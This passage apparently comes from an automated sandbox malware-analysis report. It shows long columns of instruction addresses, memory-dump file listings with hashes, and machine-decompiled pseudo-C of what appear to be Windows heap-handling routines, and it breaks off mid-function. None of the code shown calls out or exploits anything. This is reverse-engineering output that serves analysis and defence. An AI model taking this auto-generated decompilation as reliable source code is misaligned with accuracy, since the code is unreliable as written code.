                                                0x00933e76
                                                0x00933e78
                                                0x00933e7c
                                                0x00933e7f
                                                0x00933e7f
                                                0x00933e80
                                                0x00933e80
                                                0x00933e7c
                                                0x00933e76
                                                0x00933e8f
                                                0x00933e99
                                                0x00933e9b
                                                0x00933e9e
                                                0x00933ea0
                                                0x0094e832
                                                0x0094e838
                                                0x0094e83e
                                                0x0094e86e
                                                0x0094e86e
                                                0x00000000
                                                0x0094e86e
                                                0x0094e840
                                                0x0094e845
                                                0x00000000
                                                0x00000000
                                                0x0094e847
                                                0x0094e84d
                                                0x0094e858
                                                0x0094e85e
                                                0x0094e864
                                                0x0094e866
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00933ea6
                                                0x00933ea6
                                                0x00933ea6
                                                0x00933eb5
                                                0x00933ec2
                                                0x00933ec5
                                                0x00933ecd
                                                0x00933ed0
                                                0x00933ed9
                                                0x00933ee0
                                                0x00933ee4
                                                0x00933ee5
                                                0x00933ee9
                                                0x00933ee9
                                                0x00933ee9
                                                0x00933ee0
                                                0x00933ef2
                                                0x00933efa
                                                0x00933f02
                                                0x00933f05
                                                0x00933f08
                                                0x00933f0a
                                                0x00933f14
                                                0x00933f1c
                                                0x00933f1f
                                                0x00933f1f
                                                0x00933f21
                                                0x00933f21
                                                0x00933f26
                                                0x00933f3a
                                                0x00933f41
                                                0x00933f46
                                                0x00933f48
                                                0x00000000
                                                0x00933f4e
                                                0x00933f4e
                                                0x00933f54
                                                0x00933f5a
                                                0x00933f5c
                                                0x00933f62
                                                0x00933f62
                                                0x00000000
                                                0x00933f5c
                                                0x00933f48
                                                0x00933ea0
                                                0x00000000
                                                0x00933e27
                                                0x00922a40
                                                0x00922a29
                                                0x009229d5
                                                0x009229db
                                                0x009229e1
                                                0x009229e3
                                                0x009229eb
                                                0x009229ee
                                                0x009229f3
                                                0x009229f4
                                                0x009229fb
                                                0x00000000
                                                0x00922a03
                                                0x00922a07
                                                0x00000000
                                                0x00922a09
                                                0x00922a09
                                                0x00922a10
                                                0x00000000
                                                0x00922a10
                                                0x00922a07
                                                0x009229fb
                                                0x009229ee
                                                0x00000000
                                                0x009229e1
                                                0x0092298c
                                                0x009229b2
                                                0x009229b6
                                                0x0094e817
                                                0x0094e81d
                                                0x0094e81f
                                                0x0094e82b
                                                0x0094e82b
                                                0x00000000
                                                0x0094e81f
                                                0x009229c2
                                                0x00000000
                                                0x009229c8
                                                0x009229c8
                                                0x00000000
                                                0x009229c8
                                                0x009229c2
                                                0x00922964
                                                0x00000000
                                                0x00000000
                                                0x0092296a
                                                0x00922971
                                                0x00000000
                                                0x00000000
                                                0x00922973
                                                0x0092297a
                                                0x0094e74d
                                                0x0094e751
                                                0x0094e755
                                                0x0094e791
                                                0x0094e791
                                                0x0094e793
                                                0x00000000
                                                0x0094e793
                                                0x0094e757
                                                0x0094e75b
                                                0x00000000
                                                0x00000000
                                                0x0094e75d
                                                0x0094e761
                                                0x00000000
                                                0x00000000
                                                0x0094e767
                                                0x0094e76b
                                                0x00000000
                                                0x00000000
                                                0x0094e771
                                                0x0094e775
                                                0x0094e779
                                                0x0094e785
                                                0x0094e785
                                                0x00000000
                                                0x0094e785
                                                0x0094e77b
                                                0x0094e77f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094e77f
                                                0x00000000
                                                0x009235ae
                                                0x009235ae
                                                0x009235b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009235ba
                                                0x00922941

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67f819c3a17e43fd7f57af0a36901aff283d6d4636b88739283d799b7217cd9b
                                                • Instruction ID: 7c332c928ee8e35352a2f2e84813f0d08c3d7f24c39635bfa5b0ac5d07e7a73c
                                                • Opcode Fuzzy Hash: 67f819c3a17e43fd7f57af0a36901aff283d6d4636b88739283d799b7217cd9b
                                                • Instruction Fuzzy Hash: 4302917490013A9ACF349F54D888BB9B3B8FF18300F5445EAE949A71A4E7788ED1DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A2622, Relevance: .4, Instructions: 398COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E009A2622(signed int _a4, signed int _a8) {
				intOrPtr _t192;
				intOrPtr _t194;
				signed short _t195;
				unsigned int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t205;
				unsigned int _t206;
				signed char _t209;
				intOrPtr _t211;
				unsigned int _t212;
				unsigned int _t213;
				unsigned int _t214;
				signed int _t216;
				signed int _t222;
				signed short _t223;
				void* _t225;
				signed short _t226;
				signed int _t229;
				signed int _t231;
				unsigned int _t234;
				signed char _t235;
				signed short _t236;
				signed int _t238;
				signed char _t239;
				signed short _t240;
				signed int _t242;
				signed short _t243;
				signed short _t253;
				signed int _t263;
				signed int _t266;
				unsigned int _t268;
				unsigned int _t271;
				signed int _t275;
				signed short _t281;
				unsigned char _t282;
				signed char _t284;
				unsigned int _t285;
				signed int _t286;
				signed int _t287;
				signed short _t290;
				signed int _t292;
				signed char _t293;
				signed short _t294;
				signed int _t296;
				signed short _t297;
				signed short _t307;
				signed int _t315;
				signed int _t317;
				signed char _t322;
				signed int _t325;
				void* _t332;
				signed char _t341;
				signed int _t342;
				signed int _t360;
				unsigned int* _t363;
				unsigned int _t366;
				signed int _t368;
				unsigned int _t369;

				_t275 = _a4;
				if( *((char*)(_t275 + 0xda)) != 2) {
					_t268 = 0;
				} else {
					_t268 =  *((intOrPtr*)(_t275 + 0xd4));
				}
				if(_t268 == 0) {
					return 0;
				}
				_t363 = _a8;
				_t366 =  *_t363;
				if(_t363[2] != 0) {
					_t366 = _t366 - 8;
					if( *(_t366 + 7) != 5) {
						goto L10;
					} else {
						_t8 = _t366 + 6; // 0xff8b9090
						_t266 = ( *_t8 & 0x000000ff) << 3;
						goto L9;
					}
				} else {
					_t6 =  &(_t363[2]); // 0x5653018b
					_t266 =  *_t6 & 0x000000ff;
					L9:
					_t366 = _t366 - _t266;
					L10:
					if(( *(_t366 + 7) & 0x00000080) == 0) {
						_t192 =  *((intOrPtr*)(_t268 + 0x24));
						_t90 = _t366 + 2; // 0x90909000
						_t279 =  *(_t192 + 0x4c) >> 0x00000014 &  *(_t192 + 0x52) ^  *_t90;
						if((( *(_t192 + 0x4c) >> 0x00000014 &  *(_t192 + 0x52) ^  *_t90) & 0x00000001) == 0) {
							L108:
							if(E009A25DE(_t279, _t332, _t268, _t366) != 0 || _t268 ==  *_t363) {
								L113:
								_t363[2] = 8;
								_t194 =  *((intOrPtr*)(_t268 + 0x24));
								if( *(_t194 + 0x4c) == 0) {
									_t195 =  *_t366 & 0x0000ffff;
								} else {
									_t281 =  *_t366;
									if(( *(_t194 + 0x4c) & _t281) != 0) {
										_t281 = _t281 ^  *(_t194 + 0x50);
									}
									_t195 = _t281 & 0x0000ffff;
								}
								_t187 =  &(_t363[2]); // 0x5653018b
								_t363[1] = ((_t195 & 0x0000ffff) << 3) - ( *_t187 & 0x000000ff);
								_t189 = _t366 + 6; // 0xff8b9090
								_t363[2] =  *_t189;
								_t200 = 0x201;
								L119:
								_t363[2] = _t200;
								_t201 = 1;
								goto L120;
							} else {
								_t202 =  *((intOrPtr*)(_t268 + 0x24));
								_t172 = _t366 + 2; // 0x90909000
								_t282 =  *_t172;
								if((( *(_t202 + 0x4c) >> 0x00000014 &  *(_t202 + 0x52) ^ _t282) & 0x00000001) == 0 || (( *(_t202 + 0x4c) >> 0x00000014 &  *(_t202 + 0x52) >> 0x00000003 ^ _t282 >> 0x00000003) & 0x00000001) == 0) {
									L112:
									_t201 = 0;
									L120:
									return _t201;
								} else {
									goto L113;
								}
							}
						}
						if( *(_t192 + 0x4c) == 0) {
							_t205 =  *_t366 & 0x0000ffff;
						} else {
							_t279 =  *_t366;
							if(( *(_t192 + 0x4c) & _t279) != 0) {
								_t279 = _t279 ^  *(_t192 + 0x50);
							}
							_t205 = _t279 & 0x0000ffff;
						}
						if(_t205 <= 3) {
							goto L108;
						} else {
							_t206 =  *_t363;
							if( *((intOrPtr*)(_t206 + 0xc)) != 0xf0e0d0c0) {
								goto L108;
							}
							_a8 =  *_t206;
							if(E009A25DE(_t279, _t332, _t268,  *_t206) == 0) {
								goto L108;
							}
							_t100 = _t366 + 7; // 0x55ff8b90
							_t209 =  *_t100;
							if((_t209 & 0x00000040) == 0) {
								if(_t209 != 4) {
									_t107 = _t366 + 8; // 0x98ed2c
									_t279 = _t107;
									L69:
									_t109 = _a8 + 4; // 0x84d8bec
									_t211 =  *_t109;
									if(_t211 != _t279) {
										goto L108;
									}
									_t284 =  *((intOrPtr*)(_t211 + 0x17));
									_t212 = _t211 + 0x10;
									if((_t284 & 0x00000040) == 0) {
										if(_t284 != 4) {
											_t117 = _t212 + 8; // 0x84d8be4
											_t285 = _t117;
											L76:
											 *_t363 = _t285;
											_t341 =  *((intOrPtr*)(_t212 + 7));
											_t286 = _t341 & 0x000000ff;
											if((_t286 & 0xffffff3f) == 0) {
												_t287 = _a8;
												_t363[2] = 8;
												_t165 = _t287 + 0x10; // 0x1f1840f
												_t363[1] = ( *_t165 & 0x0000ffff) * 8 - 8;
												_t213 =  *(_t212 + 6);
												L53:
												_t363[2] = _t213;
												_t200 = 0;
												goto L119;
											}
											if(_t341 != 5) {
												if((_t341 & 0x00000040) == 0) {
													if((_t341 & 0x0000003f) == 0x3f) {
														if(_t341 >= 0) {
															_t342 = _a4;
															if( *(_t342 + 0x4c) == 0) {
																_t290 =  *_t212 & 0x0000ffff;
															} else {
																_t307 =  *_t212;
																if(( *(_t342 + 0x4c) & _t307) != 0) {
																	_t307 = _t307 ^  *(_t342 + 0x50);
																}
																_t290 = _t307 & 0x0000ffff;
															}
														} else {
															_t290 =  *((intOrPtr*)((_t212 >> 0x00000003 ^  *_t212 ^  *0x9d00a4 ^ _a4) + 0x10));
														}
														_t292 =  *(_t212 + (_t290 & 0x0000ffff) * 8 - 4);
													} else {
														_t292 = _t286 & 0x0000003f;
													}
												} else {
													_t292 =  *(_t212 + 4 + (_t286 & 0x0000003f) * 8) & 0x0000ffff;
												}
												_t368 = _a4;
											} else {
												_t368 = _a4;
												_t292 =  *(_t368 + 0x54) & 0x0000ffff ^  *(_t212 + 4) & 0x0000ffff;
											}
											_t363[2] = _t292;
											_t293 =  *((intOrPtr*)(_t212 + 7));
											if(_t293 != 5) {
												if((_t293 & 0x00000040) == 0) {
													if((_t293 & 0x0000003f) == 0x3f) {
														if(_t293 >= 0) {
															if( *(_t368 + 0x4c) == 0) {
																_t294 =  *_t212 & 0x0000ffff;
															} else {
																_t297 =  *_t212;
																if(( *(_t368 + 0x4c) & _t297) != 0) {
																	_t297 = _t297 ^  *(_t368 + 0x50);
																}
																_t294 = _t297 & 0x0000ffff;
															}
														} else {
															_t294 =  *((intOrPtr*)((_t212 >> 0x00000003 ^  *_t212 ^  *0x9d00a4 ^ _t368) + 0x10));
														}
														_t296 =  *(_t212 + (_t294 & 0x0000ffff) * 8 - 4);
													} else {
														_t296 = _t293 & 0x3f;
													}
												} else {
													_t296 =  *(_t212 + 4 + (_t293 & 0x3f) * 8) & 0x0000ffff;
												}
											} else {
												_t296 =  *(_t368 + 0x54) & 0x0000ffff ^  *(_t212 + 4) & 0x0000ffff;
											}
											_t160 = _a8 + 0x10; // 0x1f1840f
											_t363[1] = (( *_t160 & 0x0000ffff) << 3) - _t296;
											_t214 =  *(_t212 + 6);
											L51:
											_t363[2] = _t214;
											_t200 = 1;
											goto L119;
										}
										_t315 =  *(_t212 + 6) & 0x000000ff;
										L72:
										_t114 = _t315 * 8; // 0x84d8be4
										_t285 = _t212 + _t114 + 8;
										goto L76;
									}
									_t315 = _t284 & 0x3f;
									goto L72;
								}
								_t106 = _t366 + 6; // 0xff8b9090
								_t216 =  *_t106 & 0x000000ff;
								L65:
								_t104 = _t216 * 8; // 0x98ed2c
								_t279 = _t366 + _t104 + 8;
								goto L69;
							}
							_t216 = _t209 & 0x3f;
							goto L65;
						}
					}
					_t222 = _t366 >> 0x00000003 ^  *_t366 ^  *0x9d00a4 ^ _t275;
					_a8 = _t222;
					if(_t222 == 0) {
						goto L112;
					}
					_t317 = _t222;
					_t223 = E009A230E(_t317);
					_t271 =  *(_t317 + 4);
					_t369 = _t366 + (_t223 & 0x0000ffff) * 8;
					_t225 = E009A22C0(_t317, _t271);
					_t226 = E009A230E(_a8);
					_t22 = _a8 + 0x14; // 0xf8830000
					if((_t369 - _t225 >> 3) / (_t226 & 0x0000ffff) < ( *_t22 & 0x0000ffff)) {
						_t24 = _t369 + 7; // 0x55ff8b90
						_t322 =  *_t24;
						_t229 = _t322 & 0x000000ff;
						if((_t229 & 0xffffff3f) == 0) {
							_t78 = _t369 + 8; // 0x98ed2c
							 *_t363 = _t78;
							_t231 = _a8;
							_t363[2] = 8;
							_t81 = _t231 + 0x10; // 0x1f1840f
							_t363[1] = ( *_t81 & 0x0000ffff) * 8 - 8;
							_t85 = _t369 + 6; // 0xff8b9090
							_t213 =  *_t85;
							goto L53;
						}
						_t360 = 0x3f;
						if((_t322 & 0x00000040) == 0) {
							if(_t322 != 4) {
								_t33 = _t369 + 8; // 0x98ed2c
								_t234 = _t33;
								goto L21;
							} else {
								_t32 = _t369 + 6; // 0xff8b9090
								_t263 =  *_t32 & 0x000000ff;
								goto L17;
							}
						} else {
							_t263 = _t229 & _t360;
							L17:
							_t30 = _t263 * 8; // 0x98ed2c
							_t234 = _t369 + _t30 + 8;
							L21:
							 *_t363 = _t234;
							_t34 = _t369 + 7; // 0x55ff8b90
							_t235 =  *_t34;
							if(_t235 != 5) {
								if((_t235 & 0x00000040) == 0) {
									if((_t235 & _t360) == _t360) {
										if(_t235 >= 0) {
											_t325 = _a4;
											if( *(_t325 + 0x4c) == 0) {
												_t236 =  *_t369 & 0x0000ffff;
											} else {
												_t253 =  *_t369;
												if(( *(_t325 + 0x4c) & _t253) != 0) {
													_t253 = _t253 ^  *(_t325 + 0x50);
												}
												_t236 = _t253 & 0x0000ffff;
											}
										} else {
											_t325 = _a4;
											_t45 = (_t369 >> 0x00000003 ^  *_t369 ^  *0x9d00a4 ^ _t325) + 0x10; // 0x5653018b
											_t236 =  *_t45;
										}
										_t53 = (_t236 & 0x0000ffff) * 8; // 0xc95b5e5f
										_t238 =  *(_t369 + _t53 - 4);
										L36:
										_t363[2] = _t238;
										_t56 = _t369 + 7; // 0x55ff8b90
										_t239 =  *_t56;
										if(_t239 != 5) {
											if((_t239 & 0x00000040) == 0) {
												if((_t239 & _t360) == _t360) {
													if(_t239 >= 0) {
														if( *(_t325 + 0x4c) == 0) {
															_t240 =  *_t369 & 0x0000ffff;
														} else {
															_t243 =  *_t369;
															if(( *(_t325 + 0x4c) & _t243) != 0) {
																_t243 = _t243 ^  *(_t325 + 0x50);
															}
															_t240 = _t243 & 0x0000ffff;
														}
													} else {
														_t64 = (_t369 >> 0x00000003 ^  *_t369 ^  *0x9d00a4 ^ _t325) + 0x10; // 0x5653018b
														_t240 =  *_t64;
													}
													_t71 = (_t240 & 0x0000ffff) * 8; // 0xc95b5e5f
													_t242 =  *(_t369 + _t71 - 4);
												} else {
													_t242 = _t239 & 0x000000ff & _t360;
												}
											} else {
												_t62 = (_t239 & 0x000000ff & _t360) * 8; // 0x90909090
												_t242 =  *(_t369 + _t62 + 4) & 0x0000ffff;
											}
										} else {
											_t58 = _t369 + 4; // 0x90909090
											_t242 =  *(_t325 + 0x54) & 0x0000ffff ^  *_t58 & 0x0000ffff;
										}
										_t74 = _a8 + 0x10; // 0x1f1840f
										_t363[1] = (( *_t74 & 0x0000ffff) << 3) - _t242;
										_t76 = _t369 + 6; // 0xff8b9090
										_t214 =  *_t76;
										goto L51;
									}
									_t238 = _t235 & 0x000000ff & _t360;
									L25:
									_t325 = _a4;
									goto L36;
								}
								_t41 = (_t235 & 0x000000ff & _t360) * 8; // 0x90909090
								_t238 =  *(_t369 + _t41 + 4) & 0x0000ffff;
								goto L25;
							}
							_t325 = _a4;
							_t37 = _t369 + 4; // 0x90909090
							_t238 =  *(_t325 + 0x54) & 0x0000ffff ^  *_t37 & 0x0000ffff;
							goto L36;
						}
					} else {
						 *_t363 = _t271;
						_t363[2] = 0x201;
						goto L112;
					}
				}
			}






























































                                                0x009a2627
                                                0x009a2632
                                                0x009a263c
                                                0x009a2634
                                                0x009a2634
                                                0x009a2634
                                                0x009a2640
                                                0x00000000
                                                0x009a2642
                                                0x009a264b
                                                0x009a2653
                                                0x009a2655
                                                0x009a265d
                                                0x009a2664
                                                0x00000000
                                                0x009a2666
                                                0x009a2666
                                                0x009a266a
                                                0x00000000
                                                0x009a266a
                                                0x009a2657
                                                0x009a2657
                                                0x009a2657
                                                0x009a266d
                                                0x009a266d
                                                0x009a266f
                                                0x009a2673
                                                0x009a2839
                                                0x009a2845
                                                0x009a2845
                                                0x009a284b
                                                0x009a2a19
                                                0x009a2a22
                                                0x009a2a5a
                                                0x009a2a5a
                                                0x009a2a5e
                                                0x009a2a65
                                                0x009a2a76
                                                0x009a2a67
                                                0x009a2a67
                                                0x009a2a6c
                                                0x009a2a6e
                                                0x009a2a6e
                                                0x009a2a71
                                                0x009a2a71
                                                0x009a2a79
                                                0x009a2a85
                                                0x009a2a88
                                                0x009a2a8b
                                                0x009a2a8e
                                                0x009a2a93
                                                0x009a2a93
                                                0x009a2a97
                                                0x00000000
                                                0x009a2a28
                                                0x009a2a28
                                                0x009a2a2e
                                                0x009a2a2e
                                                0x009a2a3c
                                                0x009a2a56
                                                0x009a2a56
                                                0x009a2a99
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a2a3c
                                                0x009a2a22
                                                0x009a2855
                                                0x009a2866
                                                0x009a2857
                                                0x009a2857
                                                0x009a285c
                                                0x009a285e
                                                0x009a285e
                                                0x009a2861
                                                0x009a2861
                                                0x009a286d
                                                0x00000000
                                                0x009a2873
                                                0x009a2873
                                                0x009a287c
                                                0x00000000
                                                0x00000000
                                                0x009a2886
                                                0x009a2890
                                                0x00000000
                                                0x00000000
                                                0x009a2896
                                                0x009a2896
                                                0x009a289b
                                                0x009a28ab
                                                0x009a28b3
                                                0x009a28b3
                                                0x009a28b6
                                                0x009a28b9
                                                0x009a28b9
                                                0x009a28be
                                                0x00000000
                                                0x00000000
                                                0x009a28c4
                                                0x009a28c7
                                                0x009a28cd
                                                0x009a28de
                                                0x009a28e6
                                                0x009a28e6
                                                0x009a28e9
                                                0x009a28e9
                                                0x009a28eb
                                                0x009a28ee
                                                0x009a28f7
                                                0x009a29fc
                                                0x009a29ff
                                                0x009a2a03
                                                0x009a2a0e
                                                0x009a2a11
                                                0x009a282f
                                                0x009a282f
                                                0x009a2832
                                                0x00000000
                                                0x009a2832
                                                0x009a2900
                                                0x009a2914
                                                0x009a2928
                                                0x009a2931
                                                0x009a294b
                                                0x009a2952
                                                0x009a2963
                                                0x009a2954
                                                0x009a2954
                                                0x009a2959
                                                0x009a295b
                                                0x009a295b
                                                0x009a295e
                                                0x009a295e
                                                0x009a2933
                                                0x009a2945
                                                0x009a2945
                                                0x009a2969
                                                0x009a292a
                                                0x009a292a
                                                0x009a292a
                                                0x009a2916
                                                0x009a2919
                                                0x009a2919
                                                0x009a296d
                                                0x009a2902
                                                0x009a2902
                                                0x009a290d
                                                0x009a290d
                                                0x009a2970
                                                0x009a2973
                                                0x009a2979
                                                0x009a298a
                                                0x009a29a1
                                                0x009a29ad
                                                0x009a29ca
                                                0x009a29db
                                                0x009a29cc
                                                0x009a29cc
                                                0x009a29d1
                                                0x009a29d3
                                                0x009a29d3
                                                0x009a29d6
                                                0x009a29d6
                                                0x009a29af
                                                0x009a29c0
                                                0x009a29c0
                                                0x009a29e1
                                                0x009a29a3
                                                0x009a29a6
                                                0x009a29a6
                                                0x009a298c
                                                0x009a2992
                                                0x009a2992
                                                0x009a297b
                                                0x009a2983
                                                0x009a2983
                                                0x009a29e8
                                                0x009a29f1
                                                0x009a29f4
                                                0x009a2807
                                                0x009a2807
                                                0x009a280c
                                                0x00000000
                                                0x009a280c
                                                0x009a28e0
                                                0x009a28d5
                                                0x009a28d5
                                                0x009a28d5
                                                0x00000000
                                                0x009a28d5
                                                0x009a28d2
                                                0x00000000
                                                0x009a28d2
                                                0x009a28ad
                                                0x009a28ad
                                                0x009a28a3
                                                0x009a28a3
                                                0x009a28a3
                                                0x00000000
                                                0x009a28a3
                                                0x009a28a0
                                                0x00000000
                                                0x009a28a0
                                                0x009a286d
                                                0x009a2688
                                                0x009a268a
                                                0x009a268d
                                                0x00000000
                                                0x00000000
                                                0x009a2693
                                                0x009a2695
                                                0x009a269a
                                                0x009a26a2
                                                0x009a26a5
                                                0x009a26b4
                                                0x009a26c5
                                                0x009a26cb
                                                0x009a26dd
                                                0x009a26dd
                                                0x009a26e0
                                                0x009a26e8
                                                0x009a2812
                                                0x009a2815
                                                0x009a2817
                                                0x009a281a
                                                0x009a281e
                                                0x009a2829
                                                0x009a282c
                                                0x009a282c
                                                0x00000000
                                                0x009a282c
                                                0x009a26f0
                                                0x009a26f4
                                                0x009a2701
                                                0x009a2709
                                                0x009a2709
                                                0x00000000
                                                0x009a2703
                                                0x009a2703
                                                0x009a2703
                                                0x00000000
                                                0x009a2703
                                                0x009a26f6
                                                0x009a26f6
                                                0x009a26f8
                                                0x009a26f8
                                                0x009a26f8
                                                0x009a270c
                                                0x009a270c
                                                0x009a270e
                                                0x009a270e
                                                0x009a2713
                                                0x009a2726
                                                0x009a273d
                                                0x009a2748
                                                0x009a2764
                                                0x009a276b
                                                0x009a277c
                                                0x009a276d
                                                0x009a276d
                                                0x009a2772
                                                0x009a2774
                                                0x009a2774
                                                0x009a2777
                                                0x009a2777
                                                0x009a274a
                                                0x009a2759
                                                0x009a275e
                                                0x009a275e
                                                0x009a275e
                                                0x009a2782
                                                0x009a2782
                                                0x009a2786
                                                0x009a2786
                                                0x009a2789
                                                0x009a2789
                                                0x009a278e
                                                0x009a279e
                                                0x009a27b2
                                                0x009a27bd
                                                0x009a27da
                                                0x009a27eb
                                                0x009a27dc
                                                0x009a27dc
                                                0x009a27e1
                                                0x009a27e3
                                                0x009a27e3
                                                0x009a27e6
                                                0x009a27e6
                                                0x009a27bf
                                                0x009a27d0
                                                0x009a27d0
                                                0x009a27d0
                                                0x009a27f1
                                                0x009a27f1
                                                0x009a27b4
                                                0x009a27b7
                                                0x009a27b7
                                                0x009a27a0
                                                0x009a27a5
                                                0x009a27a5
                                                0x009a27a5
                                                0x009a2790
                                                0x009a2794
                                                0x009a2798
                                                0x009a2798
                                                0x009a27f8
                                                0x009a2801
                                                0x009a2804
                                                0x009a2804
                                                0x00000000
                                                0x009a2804
                                                0x009a2742
                                                0x009a2732
                                                0x009a2732
                                                0x00000000
                                                0x009a2732
                                                0x009a272d
                                                0x009a272d
                                                0x00000000
                                                0x009a272d
                                                0x009a2715
                                                0x009a271c
                                                0x009a2720
                                                0x00000000
                                                0x009a2720
                                                0x009a26cd
                                                0x009a26d2
                                                0x009a26d4
                                                0x00000000
                                                0x009a26d4
                                                0x009a26cb

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a32aa0ace7ead52973f61cfbb04fbe553d5cd239aa31793e462a0c6b81421e56
                                                • Instruction ID: a88d332fc70d9d3ea26ff0400f4d990d701d2152e71ba561bce3a7ded369b004
                                                • Opcode Fuzzy Hash: a32aa0ace7ead52973f61cfbb04fbe553d5cd239aa31793e462a0c6b81421e56
                                                • Instruction Fuzzy Hash: C2E1E3302146518FD728CF1DC1906B2B7E5EF56310F24C85EE8D68F692D339E955EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090C7BC, Relevance: .3, Instructions: 333COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 62%
                                                			E0090C7BC(signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t137;
				intOrPtr* _t140;
				intOrPtr _t141;
				signed int _t144;
				intOrPtr* _t145;
				void* _t147;
				intOrPtr _t150;
				void* _t158;
				signed char _t160;
				signed short _t161;
				signed int _t163;
				signed char _t164;
				signed short _t166;
				signed int _t177;
				void* _t192;
				signed char _t193;
				unsigned int _t195;
				signed int _t196;
				signed int _t207;
				intOrPtr* _t208;
				signed char _t210;
				intOrPtr _t211;
				intOrPtr* _t212;
				signed short _t215;
				signed short _t217;
				signed int _t226;
				signed short _t230;
				void* _t234;
				intOrPtr _t239;
				unsigned int _t240;
				signed char _t243;
				signed int _t244;
				signed int _t246;
				intOrPtr _t250;
				intOrPtr _t251;

				_t193 = _a12;
				_t248 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t193 == 0) {
					_push(0);
					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0090641D(__eflags);
					L14:
					return 0;
				}
				_t246 = _a4;
				if(( *(_t246 + 0x44) & 0x01000000) != 0) {
					return E009A1238(_t193, _t234, _t246, 0, __eflags, _t246, _a8, _t193, _a16);
				}
				if(( *(_t246 + 0x48) & 0x00000001) != 0) {
					_t137 = E00940ACE(_t246, _t193, 0, __eflags);
					L6:
					_t248 = _t137;
					goto L7;
				} else {
					if((_t193 & 0x00000007) != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(_t193);
						_push(_t246);
						_push(9);
						L21:
						E0099F840(_t193, _t199, _t234, _t246, _t248, __eflags);
						L7:
						if(_t248 == 0) {
							L22:
							_push(0xc000000d);
							 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
							 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0090641D(__eflags);
							goto L14;
						}
						_t260 =  *((char*)(_t193 - 1)) - 5;
						if( *((char*)(_t193 - 1)) == 5) {
							__eflags = _a8 & 0x3c000102;
							_t40 = _t193 - 8; // -8
							_t140 = _t40;
							_v12 =  *_t140;
							if(__eflags != 0) {
								goto L9;
							}
							_t210 =  *((intOrPtr*)(_t140 + 7));
							__eflags = _t210 - 5;
							if(_t210 != 5) {
								__eflags = _t210 & 0x00000040;
								if((_t210 & 0x00000040) == 0) {
									_t47 =  &_v8;
									 *_t47 = _v8 & 0x00000000;
									__eflags =  *_t47;
									L30:
									_t196 = _v8 & 0x0000ffff;
									_t239 = _a16;
									_t211 = _t196 + _t239;
									__eflags = _t211 - _t239;
									if(__eflags < 0) {
										goto L22;
									}
									__eflags =  *((char*)(_t140 + 7)) - 5;
									_a16 = _t211;
									if( *((char*)(_t140 + 7)) != 5) {
										_t158 = 0;
										__eflags = 0;
									} else {
										_t158 = _t140 - (( *(_t140 + 6) & 0x000000ff) << 3) + 8;
									}
									_t240 = _v12;
									__eflags = _t240;
									if(_t240 == 0) {
										L37:
										_t212 = 0;
										__eflags = 0;
										goto L38;
									} else {
										_t226 = _t240 - 0x00000001 & 0x0000ffff;
										__eflags = _t226 -  *0x9d7990; // 0x3
										if(__eflags >= 0) {
											goto L37;
										}
										_t212 =  *((intOrPtr*)(0x96de08 + _t226 * 4));
										L38:
										__eflags =  *_t212(_t246, 5, _t240 >> 0x10, _t158);
										if(__eflags < 0) {
											goto L22;
										}
										_t160 =  *(_t248 + 7);
										__eflags = _t160 - 4;
										if(_t160 != 4) {
											__eflags = _t160 - 5;
											if(_t160 != 5) {
												__eflags = _t160 & 0x00000040;
												if((_t160 & 0x00000040) == 0) {
													__eflags = (_t160 & 0x0000003f) - 0x3f;
													if((_t160 & 0x0000003f) == 0x3f) {
														__eflags = _t160;
														if(_t160 >= 0) {
															__eflags =  *(_t246 + 0x4c);
															if( *(_t246 + 0x4c) == 0) {
																_t161 =  *_t248 & 0x0000ffff;
															} else {
																_t166 =  *_t248;
																__eflags =  *(_t246 + 0x4c) & _t166;
																if(( *(_t246 + 0x4c) & _t166) != 0) {
